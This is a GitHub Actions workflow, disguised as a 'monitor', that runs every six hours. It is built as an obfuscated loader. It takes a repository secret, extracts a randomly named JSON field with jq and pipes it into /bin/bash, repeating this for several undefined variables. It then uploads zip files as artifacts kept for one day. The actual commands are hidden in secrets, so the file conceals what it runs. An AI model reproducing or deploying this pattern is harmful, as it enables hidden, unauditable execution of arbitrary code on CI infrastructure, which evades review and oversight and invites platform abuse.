name: brendamonitor204
on:
  workflow_dispatch:

  schedule:
    - cron: '59 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: brendamonitor204
        env:
          xut45451: ${{ secrets.xut45451 }}
        run: |
          printf '%s' "$xut45451" | jq -r .lownk330 | /bin/bash
          printf '%s' "$avnfe39750" | jq -r .m5575 | /bin/bash
          printf '%s' "$ledca85" | jq -r .vkxju51926 | /bin/bash
          printf '%s' "$mldba96" | jq -r .bxgyk398 | /bin/bash
          echo $fw86554 | jq -r .lji2903 | /bin/bash
          printf '%s' "$icpr08806" | jq -r .cb1 | /bin/bash
          echo $uizn0573 | jq -r .h2678 | /bin/bash
          printf '%s' "$irq6" | jq -r .yyjvd480 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: mcrEcFQL
          path: "*.zip"
          retention-days: 1
